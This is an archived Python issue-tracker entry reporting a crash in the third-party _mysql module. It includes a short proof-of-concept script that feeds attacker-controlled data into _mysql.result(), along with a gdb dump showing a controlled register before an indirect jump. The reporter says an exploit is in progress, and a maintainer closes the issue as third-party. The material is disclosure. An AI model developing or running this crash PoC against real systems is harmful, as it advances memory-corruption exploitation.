This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

classification
Title: Bad cast@ _mysql_ResultObject_Initialize() result in code execution
Type: crash Stage: resolved
Components: Library (Lib) Versions: Python 2.7
process
Status: closed Resolution: third party
Dependencies: Superseder:
Assigned To: Nosy List: christian.heimes, zeroinside
Priority: normal Keywords:

Created on 2017-01-04 11:26 by zeroinside, last changed 2022-04-11 14:58 by admin. This issue is now closed.

Messages (2)
msg284629 - (view) Author: zeroinside (zeroinside) Date: 2017-01-04 11:26 
Hello.
I found a vulnerability in _mysql module.
PoC below:
#!/usr/bin/python2.7
import _mysql
RDX=0x66666666
payload="A"*2048
_mysql.result(payload,RDX)


It's exploitable bug, I'm working on exploit.
(gdb) run mysql.py 
Starting program: /usr/bin/python2.7 mysql.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff38e7f3c in mysql_use_result () from /usr/lib/libmysqlclient.so.18
(gdb) info reg
rax            0x4141414141414141       4702111234474983745
rbx            0x7ffff7e91b90   140737352637328
rcx            0x0      0
rdx            0x66666666       1717986918
rsi            0x7ffff7eb1ec0   140737352769216
rdi            0x5555557f9890   93824995006608
rbp            0x7fffffffe120   0x7fffffffe120
rsp            0x7fffffffe0a8   0x7fffffffe0a8
r8             0x7fffffffdd00   140737488346368
r9             0x7fffffffdd80   140737488346496
r10            0x5555557824f0   93824994518256
r11            0x2      2
r12            0x5555557560a0   93824994336928
r13            0x0      0
r14            0x7ffff7e939c7   140737352645063
r15            0x7ffff7e91b90   140737352637328
rip            0x7ffff38e7f3c   0x7ffff38e7f3c <mysql_use_result+12>
eflags         0x10206  [ PF IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
(gdb) disas $rip
Dump of assembler code for function mysql_use_result:
   0x00007ffff38e7f30 <+0>:     push   %rbp
   0x00007ffff38e7f31 <+1>:     mov    0x4d0(%rdi),%rax
   0x00007ffff38e7f38 <+8>:     mov    %rsp,%rbp
   0x00007ffff38e7f3b <+11>:    pop    %rbp
=> 0x00007ffff38e7f3c <+12>:    mov    0x18(%rax),%rax
   0x00007ffff38e7f40 <+16>:    jmpq   *%rax
End of assembler dump.
(gdb)
msg284630 - (view) Author: Christian Heimes (christian.heimes) * (Python committer) Date: 2017-01-04 11:30 
mysql is a 3rd party extension and not part of the Python standard library. Please report the issue with MySQL.
History
Date User Action Args
2022-04-11 14:58:41adminsetgithub: 73336
2017-01-04 11:30:44christian.heimessetstatus: open -> closed

type: security -> crash

nosy: + christian.heimes
messages: + msg284630
resolution: third party
stage: resolved
2017-01-04 11:26:34zeroinsidecreate